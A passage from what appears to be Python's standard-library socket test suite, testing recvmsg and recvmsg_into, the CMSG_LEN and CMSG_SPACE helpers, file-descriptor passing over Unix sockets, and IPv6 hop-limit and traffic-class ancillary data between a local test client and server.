self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(TimeoutError,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
